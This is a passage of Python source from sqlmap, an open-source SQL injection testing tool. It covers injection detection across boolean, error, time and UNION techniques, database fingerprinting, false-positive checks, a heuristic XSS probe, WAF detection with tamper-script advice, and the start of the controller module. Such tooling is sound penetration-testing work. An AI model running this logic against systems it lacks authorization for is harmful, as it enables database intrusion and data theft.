threadData.lastRedirectMsg[1] \ if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) if output: result = output == "1" if result: infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title) logger.info(infoMsg) injectable = True except SqlmapConnectionException, msg: debugMsg = "problem occurred most likely because the " debugMsg += "server hasn't recovered as expected from the " debugMsg += "error-based payload used ('%s')" % msg logger.debug(debugMsg) # In case of time-based blind or stacked queries # SQL injections elif method == PAYLOAD.METHOD.TIME: # Perform the test's request trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False) if trueResult: # Confirm test's results trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False) if trueResult: infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title) logger.info(infoMsg) injectable = True # In case of UNION query SQL injection elif method == PAYLOAD.METHOD.UNION: # Test for UNION injection and set the sample # payload as well as the vector. # NOTE: vector is set to a tuple with 6 elements, # used afterwards by Agent.forgeUnionQuery() # method to forge the UNION query payload configUnion(test.request.char, test.request.columns) if not Backend.getIdentifiedDbms(): if kb.heuristicDbms in (None, UNKNOWN_DBMS): warnMsg = "using unescaped version of the test " warnMsg += "because of zero knowledge of the " warnMsg += "back-end DBMS. 
You can try to " warnMsg += "explicitly set it using option '--dbms'" singleTimeWarnMessage(warnMsg) else: Backend.forceDbms(kb.heuristicDbms) if unionExtended: infoMsg = "automatically extending ranges " infoMsg += "for UNION query injection technique tests as " infoMsg += "there is at least one other (potential) " infoMsg += "technique found" singleTimeLogMessage(infoMsg) # Test for UNION query SQL injection reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix) if isinstance(reqPayload, basestring): infoMsg = "%s parameter '%s' is '%s' injectable" % (place, parameter, title) logger.info(infoMsg) injectable = True # Overwrite 'where' because it can be set # by unionTest() directly where = vector[6] kb.previousMethod = method if conf.dummy: injectable = False # If the injection test was successful feed the injection # object with the test's details if injectable is True: # Feed with the boundaries details only the first time a # test has been successful if injection.place is None or injection.parameter is None: if place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST): injection.parameter = place else: injection.parameter = parameter injection.place = place injection.ptype = ptype injection.prefix = prefix injection.suffix = suffix injection.clause = clause # Feed with test details every time a test is successful if hasattr(test, "details"): for dKey, dValue in test.details.items(): if dKey == "dbms": injection.dbms = dValue if not isinstance(dValue, list): Backend.setDbms(dValue) else: Backend.forceDbms(dValue[0], True) elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter: injection.dbms_version = Backend.setVersion(dValue) elif dKey == "os" and injection.os is None: injection.os = Backend.setOs(dValue) if vector is None and "vector" in test and test.vector is not None: vector = test.vector injection.data[stype] = AttribDict() injection.data[stype].title = title injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload) injection.data[stype].where = where injection.data[stype].vector = vector injection.data[stype].comment = comment injection.data[stype].templatePayload = templatePayload injection.data[stype].matchRatio = kb.matchRatio injection.conf.textOnly = conf.textOnly injection.conf.titles = conf.titles injection.conf.string = conf.string injection.conf.notString = conf.notString injection.conf.regexp = conf.regexp injection.conf.optimize = conf.optimize if not kb.alerted: if conf.beep: beep() if conf.alert: infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert logger.info(infoMsg) process = execute(conf.alert, shell=True) process.wait() kb.alerted = True # There is no need to perform this test for other # <where> tags break if injectable is True: kb.vulnHosts.add(conf.hostname) break # Reset forced back-end DBMS value Backend.flushForcedDbms() except KeyboardInterrupt: warnMsg = "user aborted during detection phase" logger.warn(warnMsg) msg = "how do you want to proceed? 
[(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]" choice = readInput(msg, default="S", checkBatch=False) if choice[0] in ("s", "S"): pass elif choice[0] in ("c", "C"): choice = None while not ((choice or "").isdigit() and 0 <= int(choice) <= 6): if choice: logger.warn("invalid value") msg = "enter new verbosity level: [0-6] " choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip() conf.verbose = int(choice) setVerbosity() tests.insert(0, test) elif choice[0] in ("n", "N"): return None elif choice[0] in ("e", "E"): kb.endDetection = True elif choice[0] in ("q", "Q"): raise SqlmapUserQuitException finally: # Reset forced back-end DBMS value Backend.flushForcedDbms() Backend.flushForcedDbms(True) # Return the injection object if injection.place is not None and injection.parameter is not None: if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'): warnMsg = "in OR boolean-based injections, please consider usage " warnMsg += "of switch '--drop-set-cookie' if you experience any " warnMsg += "problems during data retrieval" logger.warn(warnMsg) injection = checkFalsePositives(injection) if not injection: kb.vulnHosts.remove(conf.hostname) else: injection = None if injection: checkSuhosinPatch(injection) checkFilteredChars(injection) return injection def heuristicCheckDbms(injection): retVal = None pushValue(kb.injection) kb.injection = injection randStr1, randStr2 = randomStr(), randomStr() for dbms in getPublicTypeMembers(DBMS, True): Backend.forceDbms(dbms) if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)): if not checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr2)): retVal = dbms break Backend.flushForcedDbms() kb.injection = popValue() if retVal: infoMsg = "heuristic (extended) test shows that the back-end DBMS " # not as important as "parsing" counter-part (because of false-positives) infoMsg += "could be '%s' " % retVal logger.info(infoMsg) return retVal def checkFalsePositives(injection): """ Checks for false positives (only in single special cases) """ retVal = injection if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data): pushValue(kb.injection) infoMsg = "checking if the injection point on %s " % injection.place infoMsg += "parameter '%s' is a false positive" % injection.parameter logger.info(infoMsg) def _(): return int(randomInt(2)) + 1 kb.injection = injection for i in xrange(conf.level): randInt1, randInt2, randInt3 = (_() for j in xrange(3)) randInt1 = min(randInt1, randInt2, randInt3) randInt3 = max(randInt1, randInt2, randInt3) while randInt1 >= randInt2: randInt2 = _() while randInt2 >= randInt3: randInt3 = _() if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)): retVal = None break # Just in case if DBMS hasn't properly recovered from previous delayed request if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data: checkBooleanExpression("%d=%d" % (randInt1, randInt2)) if checkBooleanExpression("%d=%d" % (randInt1, randInt3)): retVal = None break elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)): retVal = None break elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)): retVal = None break if retVal is None: warnMsg = "false positive or unexploitable injection point detected" logger.warn(warnMsg) kb.injection = popValue() return retVal def 
checkSuhosinPatch(injection): """ Checks for existence of Suhosin-patch (and alike) protection mechanism(s) """ if injection.place == PLACE.GET: debugMsg = "checking for parameter length " debugMsg += "constrainting mechanisms" logger.debug(debugMsg) pushValue(kb.injection) kb.injection = injection randInt = randomInt() if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)): warnMsg = "parameter length constrainting " warnMsg += "mechanism detected (e.g. Suhosin patch). " warnMsg += "Potential problems in enumeration phase can be expected" logger.warn(warnMsg) kb.injection = popValue() def checkFilteredChars(injection): debugMsg = "checking for filtered characters" logger.debug(debugMsg) pushValue(kb.injection) kb.injection = injection randInt = randomInt() # all other techniques are already using parentheses in tests if len(injection.data) == 1 and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data: if not checkBooleanExpression("(%d)=%d" % (randInt, randInt)): warnMsg = "it appears that some non-alphanumeric characters (i.e. ()) are " warnMsg += "filtered by the back-end server. There is a strong " warnMsg += "possibility that sqlmap won't be able to properly " warnMsg += "exploit this vulnerability" logger.warn(warnMsg) # inference techniques depend on character '>' if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)): if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)): warnMsg = "it appears that the character '>' is " warnMsg += "filtered by the back-end server. You are strongly " warnMsg += "advised to rerun with the '--tamper=between'" logger.warn(warnMsg) kb.injection = popValue() def heuristicCheckSqlInjection(place, parameter): if kb.nullConnection: debugMsg = "heuristic check skipped " debugMsg += "because NULL connection used" logger.debug(debugMsg) return None if wasLastResponseDBMSError(): debugMsg = "heuristic check skipped " debugMsg += "because original page content " debugMsg += "contains DBMS error" logger.debug(debugMsg) return None origValue = conf.paramDict[place][parameter] prefix = "" suffix = "" if conf.prefix or conf.suffix: if conf.prefix: prefix = conf.prefix if conf.suffix: suffix = conf.suffix randStr = "" while '\'' not in randStr: randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET) kb.heuristicMode = True payload = "%s%s%s" % (prefix, randStr, suffix) payload = agent.payload(place, parameter, newValue=payload) page, _ = Request.queryPage(payload, place, content=True, raise404=False) kb.heuristicMode = False parseFilePaths(page) result = wasLastResponseDBMSError() infoMsg = "heuristic (basic) test shows that %s " % place infoMsg += "parameter '%s' might " % parameter def _(page): return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS) casting = _(page) and not _(kb.originalPage) if not casting and not result and kb.dynamicParameter and origValue.isdigit(): randInt = int(randomInt()) payload = "%s%s%s" % (prefix, "%d-%d" % (int(origValue) + randInt, randInt), suffix) payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE) result = Request.queryPage(payload, place, raise404=False) if not result: randStr = randomStr() payload = "%s%s%s" % (prefix, "%s%s" % (origValue, randStr), suffix) payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE) casting = Request.queryPage(payload, place, raise404=False) kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else 
HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE if casting: errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type") errMsg += "detected (e.g. \"$%s=intval($_REQUEST['%s'])\") " % (parameter, parameter) errMsg += "at the back-end web application" logger.error(errMsg) if kb.ignoreCasted is None: message = "do you want to skip those kind of cases (and save scanning time)? %s " % ("[Y/n]" if conf.multipleTargets else "[y/N]") kb.ignoreCasted = readInput(message, default='Y' if conf.multipleTargets else 'N').upper() != 'N' elif result: infoMsg += "be injectable" if Backend.getErrorParsedDBMSes(): infoMsg += " (possible DBMS: '%s')" % Format.getErrorParsedDBMSes() logger.info(infoMsg) else: infoMsg += "not be injectable" logger.warn(infoMsg) kb.heuristicMode = True value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr()) payload = "%s%s%s" % (prefix, "'%s" % value, suffix) payload = agent.payload(place, parameter, newValue=payload) page, _ = Request.queryPage(payload, place, content=True, raise404=False) if value in (page or ""): infoMsg = "heuristic (XSS) test shows that %s " % place infoMsg += "parameter '%s' might " % parameter infoMsg += "be vulnerable to XSS attacks" logger.info(infoMsg) kb.heuristicMode = False return kb.heuristicTest def checkDynParam(place, parameter, value): """ This function checks if the URL parameter is dynamic. If it is dynamic, the content of the page differs, otherwise the dynamicity might depend on another parameter. """ if kb.redirectChoice: return None kb.matchRatio = None dynResult = None randInt = randomInt() infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter) logger.info(infoMsg) try: payload = agent.payload(place, parameter, value, getUnicode(randInt)) dynResult = Request.queryPage(payload, place, raise404=False) if not dynResult: infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter) logger.info(infoMsg) randInt = randomInt() payload = agent.payload(place, parameter, value, getUnicode(randInt)) dynResult = Request.queryPage(payload, place, raise404=False) except SqlmapConnectionException: pass result = None if dynResult is None else not dynResult kb.dynamicParameter = result return result def checkDynamicContent(firstPage, secondPage): """ This function checks for the dynamic content in the provided pages """ if kb.nullConnection: debugMsg = "dynamic content checking skipped " debugMsg += "because NULL connection used" logger.debug(debugMsg) return if any(page is None for page in (firstPage, secondPage)): warnMsg = "can't check dynamic content " warnMsg += "because of lack of page content" logger.critical(warnMsg) return seqMatcher = getCurrentThreadData().seqMatcher seqMatcher.set_seq1(firstPage) seqMatcher.set_seq2(secondPage) # In case of an intolerable difference turn on dynamicity removal engine if seqMatcher.quick_ratio() <= UPPER_RATIO_BOUND: findDynamicContent(firstPage, secondPage) count = 0 while not Request.queryPage(): count += 1 if count > conf.retries: warnMsg = "target URL is too dynamic. " warnMsg += "Switching to '--text-only' " logger.warn(warnMsg) conf.textOnly = True return warnMsg = "target URL is heavily dynamic" warnMsg += ". 
sqlmap is going to retry the request" logger.critical(warnMsg) secondPage, _ = Request.queryPage(content=True) findDynamicContent(firstPage, secondPage) def checkStability(): """ This function checks if the URL content is stable requesting the same page two times with a small delay within each request to assume that it is stable. In case the content of the page differs when requesting the same page, the dynamicity might depend on other parameters, like for instance string matching (--string). """ infoMsg = "testing if the target URL is stable. This can take a couple of seconds" logger.info(infoMsg) firstPage = kb.originalPage # set inside checkConnection() time.sleep(1) secondPage, _ = Request.queryPage(content=True, raise404=False) if kb.redirectChoice: return None kb.pageStable = (firstPage == secondPage) if kb.pageStable: if firstPage: infoMsg = "target URL is stable" logger.info(infoMsg) else: errMsg = "there was an error checking the stability of page " errMsg += "because of lack of content. Please check the " errMsg += "page request results (and probable errors) by " errMsg += "using higher verbosity levels" logger.error(errMsg) else: warnMsg = "target URL is not stable. sqlmap will base the page " warnMsg += "comparison on a sequence matcher. If no dynamic nor " warnMsg += "injectable parameters are detected, or in case of " warnMsg += "junk results, refer to user's manual paragraph " warnMsg += "'Page comparison' and provide a string or regular " warnMsg += "expression to match on" logger.warn(warnMsg) message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] " test = readInput(message, default="C") if test and test[0] in ("q", "Q"): raise SqlmapUserQuitException elif test and test[0] in ("s", "S"): showStaticWords(firstPage, secondPage) message = "please enter value for parameter 'string': " test = readInput(message) if test: conf.string = test if kb.nullConnection: debugMsg = "turning off NULL connection " debugMsg += "support because of string checking" logger.debug(debugMsg) kb.nullConnection = None else: errMsg = "Empty value supplied" raise SqlmapNoneDataException(errMsg) elif test and test[0] in ("r", "R"): message = "please enter value for parameter 'regex': " test = readInput(message) if test: conf.regex = test if kb.nullConnection: debugMsg = "turning off NULL connection " debugMsg += "support because of regex checking" logger.debug(debugMsg) kb.nullConnection = None else: errMsg = "Empty value supplied" raise SqlmapNoneDataException(errMsg) else: checkDynamicContent(firstPage, secondPage) return kb.pageStable def checkString(): if not conf.string: return True infoMsg = "testing if the provided string is within the " infoMsg += "target URL page content" logger.info(infoMsg) page, headers = Request.queryPage(content=True) rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) if conf.string not in rawResponse: warnMsg = "you provided '%s' as the string to " % conf.string warnMsg += "match, but such a string is not within the target " warnMsg += "URL raw response, sqlmap will carry on anyway" logger.warn(warnMsg) return True def checkRegexp(): if not conf.regexp: return True infoMsg = "testing if the provided regular expression matches within " infoMsg += "the target URL page content" logger.info(infoMsg) page, headers = Request.queryPage(content=True) rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) if not re.search(conf.regexp, rawResponse, re.I | re.M): warnMsg = "you provided '%s' as the 
regular expression to " % conf.regexp warnMsg += "match, but such a regular expression does not have any " warnMsg += "match within the target URL raw response, sqlmap " warnMsg += "will carry on anyway" logger.warn(warnMsg) return True def checkWaf(): """ Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse """ if not conf.checkWaf: return False infoMsg = "heuristically checking if the target is protected by " infoMsg += "some kind of WAF/IPS/IDS" logger.info(infoMsg) retVal = False backup = dict(conf.parameters) payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD) conf.parameters = dict(backup) conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&" conf.parameters[PLACE.GET] += "%s=%s" % (randomStr(), payload) logger.log(CUSTOM_LOGGING.PAYLOAD, payload) kb.matchRatio = None Request.queryPage() if kb.errorIsNone and kb.matchRatio is None: kb.matchRatio = LOWER_RATIO_BOUND conf.parameters = dict(backup) conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&" conf.parameters[PLACE.GET] += "%s=%d" % (randomStr(), randomInt()) trueResult = Request.queryPage() if trueResult: conf.parameters = dict(backup) conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&" conf.parameters[PLACE.GET] += "%s=%d %s" % (randomStr(), randomInt(), IDS_WAF_CHECK_PAYLOAD) try: falseResult = Request.queryPage() except SqlmapConnectionException: falseResult = None if not falseResult: retVal = True conf.parameters = dict(backup) if retVal: warnMsg = "it appears that the target is protected. Please " warnMsg += "consider usage of tamper scripts (option '--tamper')" logger.warn(warnMsg) else: infoMsg = "it appears that the target is not protected" logger.info(infoMsg) return retVal def identifyWaf(): if not conf.identifyWaf: return None kb.testMode = True infoMsg = "using WAF scripts to detect " infoMsg += "backend WAF/IPS/IDS protection" logger.info(infoMsg) @cachedmethod def _(*args, **kwargs): page, headers, code = None, None, None try: if kwargs.get("get"): kwargs["get"] = urlencode(kwargs["get"]) kwargs["raise404"] = False kwargs["silent"] = True page, headers, code = Request.getPage(*args, **kwargs) except Exception: pass return page or "", headers or {}, code retVal = False for function, product in kb.wafFunctions: try: logger.debug("checking for WAF/IDS/IPS product '%s'" % product) found = function(_) except Exception, ex: errMsg = "exception occurred while running " errMsg += "WAF script for '%s' ('%s')" % (product, ex) logger.critical(errMsg) found = False if found: retVal = product break if retVal: errMsg = "WAF/IDS/IPS identified '%s'. Please " % retVal errMsg += "consider usage of tamper scripts (option '--tamper')" logger.critical(errMsg) message = "are you sure that you want to " message += "continue with further target testing? 
[y/N] " output = readInput(message, default="N") if output and output[0] not in ("Y", "y"): raise SqlmapUserQuitException else: infoMsg = "no WAF/IDS/IPS product has been identified" logger.info(infoMsg) kb.testType = None kb.testMode = False return retVal def checkNullConnection(): """ Reference: http://www.wisec.it/sectou.php?id=472f952d79293 """ if conf.data: return False infoMsg = "testing NULL connection to the target URL" logger.info(infoMsg) pushValue(kb.pageCompress) kb.pageCompress = False try: page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD) if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}): kb.nullConnection = NULLCONNECTION.HEAD infoMsg = "NULL connection is supported with HEAD header" logger.info(infoMsg) else: page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"}) if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}): kb.nullConnection = NULLCONNECTION.RANGE infoMsg = "NULL connection is supported with GET header " infoMsg += "'%s'" % kb.nullConnection logger.info(infoMsg) else: _, headers, _ = Request.getPage(skipRead = True) if HTTP_HEADER.CONTENT_LENGTH in (headers or {}): kb.nullConnection = NULLCONNECTION.SKIP_READ infoMsg = "NULL connection is supported with 'skip-read' method" logger.info(infoMsg) except SqlmapConnectionException, errMsg: errMsg = getUnicode(errMsg) raise SqlmapConnectionException(errMsg) kb.pageCompress = popValue() return kb.nullConnection is not None def checkConnection(suppressOutput=False): if not any((conf.proxy, conf.tor, conf.dummy)): try: socket.getaddrinfo(conf.hostname, None) except socket.gaierror: errMsg = "host '%s' does not exist" % conf.hostname raise SqlmapConnectionException(errMsg) except socket.error, ex: errMsg = "problem occurred while " errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, str(ex)) raise SqlmapConnectionException(errMsg) if not suppressOutput and not conf.dummy: infoMsg = "testing connection to the target URL" logger.info(infoMsg) try: page, _ = Request.queryPage(content=True, noteResponseTime=False) kb.originalPage = kb.pageTemplate = page kb.errorIsNone = False if not kb.originalPage and wasLastResponseHTTPError(): errMsg = "unable to retrieve page content" raise SqlmapConnectionException(errMsg) elif wasLastResponseDBMSError(): warnMsg = "there is a DBMS error found in the HTTP response body " warnMsg += "which could interfere with the results of the tests" logger.warn(warnMsg) elif wasLastResponseHTTPError(): warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError() warnMsg += "which could interfere with the results of the tests" logger.warn(warnMsg) else: kb.errorIsNone = True except SqlmapConnectionException, errMsg: if conf.ipv6: warnMsg = "check connection to a provided " warnMsg += "IPv6 address with a tool like ping6 " warnMsg += "(e.g. 'ping6 -I eth0 %s') " % conf.hostname warnMsg += "prior to running sqlmap to avoid " warnMsg += "any addressing issues" singleTimeWarnMessage(warnMsg) if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )): errMsg = getUnicode(errMsg) logger.critical(errMsg) if conf.multipleTargets: return False msg = "it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] " if readInput(msg, default="Y") not in ("n", "N"): raise SqlmapSilentQuitException else: kb.ignoreNotFound = True else: raise return True def setVerbosity(): # Cross-linked function raise NotImplementedError
55,231
Python
.py
1,037
38.557377
235
0.577101
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
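The checkFalsePositives() routine in checks.py above boils down to a consistency test: pick three distinct random integers and verify that comparisons with known truth values come back as expected through the injection point; a single wrong answer marks the finding as a false positive. A minimal sketch of that idea follows, where evaluate() is a hypothetical callable standing in for sqlmap's checkBooleanExpression():

import random

def looks_like_false_positive(evaluate):
    # evaluate(expr) -> bool is assumed to return the truth value the
    # target page reports for the injected boolean expression
    a, b, c = sorted(random.sample(range(1, 100), 3))  # distinct, a < b < c

    checks = (
        ("%d=%d" % (a, a), True),   # tautology must hold
        ("%d=%d" % (a, c), False),  # distinct values must not
        ("%d=%d" % (c, b), False),
        ("%d=%d" % (b, b), True),
    )

    # any unexpected answer means the "injection" does not really
    # control the query outcome
    return any(evaluate(expr) != expected for expr, expected in checks)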
18,974
controller.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/controller/controller.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import re from lib.controller.action import action from lib.controller.checks import checkSqlInjection from lib.controller.checks import checkDynParam from lib.controller.checks import checkStability from lib.controller.checks import checkString from lib.controller.checks import checkRegexp from lib.controller.checks import checkConnection from lib.controller.checks import checkNullConnection from lib.controller.checks import checkWaf from lib.controller.checks import heuristicCheckSqlInjection from lib.controller.checks import identifyWaf from lib.core.agent import agent from lib.core.common import dataToStdout from lib.core.common import extractRegexResult from lib.core.common import getFilteredPageContent from lib.core.common import getPublicTypeMembers from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import intersect from lib.core.common import parseTargetUrl from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeCSValue from lib.core.common import showHttpErrorCodes from lib.core.common import urlencode from lib.core.common import urldecode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import CONTENT_TYPE from lib.core.enums import HASHDB_KEYS from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTPMETHOD from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.exception import SqlmapBaseException from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapValueException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import ASP_NET_CONTROL_REGEX from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import EMPTY_FORM_FIELDS_REGEX from lib.core.settings import IGNORE_PARAMETERS from lib.core.settings import LOW_TEXT_PERCENT from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX from lib.core.settings import HOST_ALIASES from lib.core.settings import REFERER_ALIASES from lib.core.settings import USER_AGENT_ALIASES from lib.core.target import initTargetEnv from lib.core.target import setupTargetEnv from thirdparty.pagerank.pagerank import get_pagerank def _selectInjection(): """ Selection function for injection place, parameters and type. 
""" points = {} for injection in kb.injections: place = injection.place parameter = injection.parameter ptype = injection.ptype point = (place, parameter, ptype) if point not in points: points[point] = injection else: for key in points[point].keys(): if key != 'data': points[point][key] = points[point][key] or injection[key] points[point]['data'].update(injection['data']) if len(points) == 1: kb.injection = kb.injections[0] elif len(points) > 1: message = "there were multiple injection points, please select " message += "the one to use for following injections:\n" points = [] for i in xrange(0, len(kb.injections)): place = kb.injections[i].place parameter = kb.injections[i].parameter ptype = kb.injections[i].ptype point = (place, parameter, ptype) if point not in points: points.append(point) ptype = PAYLOAD.PARAMETER[ptype] if isinstance(ptype, int) else ptype message += "[%d] place: %s, parameter: " % (i, place) message += "%s, type: %s" % (parameter, ptype) if i == 0: message += " (default)" message += "\n" message += "[q] Quit" select = readInput(message, default="0") if select.isdigit() and int(select) < len(kb.injections) and int(select) >= 0: index = int(select) elif select[0] in ("Q", "q"): raise SqlmapUserQuitException else: errMsg = "invalid choice" raise SqlmapValueException(errMsg) kb.injection = kb.injections[index] def _formatInjection(inj): data = "Place: %s\n" % inj.place data += "Parameter: %s\n" % inj.parameter for stype, sdata in inj.data.items(): title = sdata.title vector = sdata.vector comment = sdata.comment payload = agent.adjustLateValues(sdata.payload) if inj.place == PLACE.CUSTOM_HEADER: payload = payload.split(',', 1)[1] if stype == PAYLOAD.TECHNIQUE.UNION: count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1 title = re.sub(r"\d+ to \d+", str(count), title) vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6]) if count == 1: title = title.replace("columns", "column") elif comment: vector = "%s%s" % (vector, comment) data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype] data += " Title: %s\n" % title data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place == PLACE.POST and kb.postSpaceToPlus)) data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n" return data def _showInjections(): header = "sqlmap identified the following injection points with " header += "a total of %d HTTP(s) requests" % kb.testQueryCount if hasattr(conf, "api"): conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES) else: data = "".join(set(map(lambda x: _formatInjection(x), kb.injections))).rstrip("\n") conf.dumper.string(header, data) if conf.tamper: warnMsg = "changes made by tampering scripts are not " warnMsg += "included in shown payload content(s)" logger.warn(warnMsg) if conf.hpp: warnMsg = "changes made by HTTP parameter pollution are not " warnMsg += "included in shown payload content(s)" logger.warn(warnMsg) def _randomFillBlankFields(value): retVal = value if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value): message = "do you want to fill blank fields with random values? 
[Y/n] " test = readInput(message, default="Y") if not test or test[0] in ("y", "Y"): for match in re.finditer(EMPTY_FORM_FIELDS_REGEX, retVal): item = match.group("result") if not any(_ in item for _ in IGNORE_PARAMETERS) and not re.search(ASP_NET_CONTROL_REGEX, item): if item[-1] == DEFAULT_GET_POST_DELIMITER: retVal = retVal.replace(item, "%s%s%s" % (item[:-1], randomStr(), DEFAULT_GET_POST_DELIMITER)) else: retVal = retVal.replace(item, "%s%s" % (item, randomStr())) return retVal def _saveToHashDB(): injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or [] injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None) _ = dict() for injection in injections: key = (injection.place, injection.parameter, injection.ptype) if key not in _: _[key] = injection else: _[key].data.update(injection.data) hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True) _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or set() _.update(kb.absFilePaths) hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, _, True) if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS): hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True) if not hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS): hashDBWrite(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, kb.dynamicMarkings, True) def _saveToResultsFile(): if not conf.resultsFP: return results = {} techniques = dict(map(lambda x: (x[1], x[0]), getPublicTypeMembers(PAYLOAD.TECHNIQUE))) for inj in kb.injections: if inj.place is None or inj.parameter is None: continue key = (inj.place, inj.parameter) if key not in results: results[key] = [] results[key].extend(inj.data.keys()) for key, value in results.items(): place, parameter = key line = "%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(map(lambda x: techniques[x][0].upper(), sorted(value))), os.linesep) conf.resultsFP.writelines(line) if not results: line = "%s,,,%s" % (conf.url, os.linesep) conf.resultsFP.writelines(line) def start(): """ This function calls a function that performs checks on both URL stability and all GET, POST, Cookie and User-Agent parameters to check if they are dynamic and SQL injection affected """ if conf.direct: initTargetEnv() setupTargetEnv() action() return True if conf.url and not any((conf.forms, conf.crawlDepth)): kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None)) if conf.configFile and not kb.targets: errMsg = "you did not edit the configuration file properly, set " errMsg += "the target URL, list of targets or google dork" logger.error(errMsg) return False if kb.targets and len(kb.targets) > 1: infoMsg = "sqlmap got a total of %d targets" % len(kb.targets) logger.info(infoMsg) hostCount = 0 initialHeaders = list(conf.httpHeaders) for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets: try: conf.url = targetUrl conf.method = targetMethod conf.data = targetData conf.cookie = targetCookie conf.httpHeaders = list(initialHeaders) conf.httpHeaders.extend(targetHeaders or []) initTargetEnv() parseTargetUrl() testSqlInj = False if PLACE.GET in conf.parameters and not 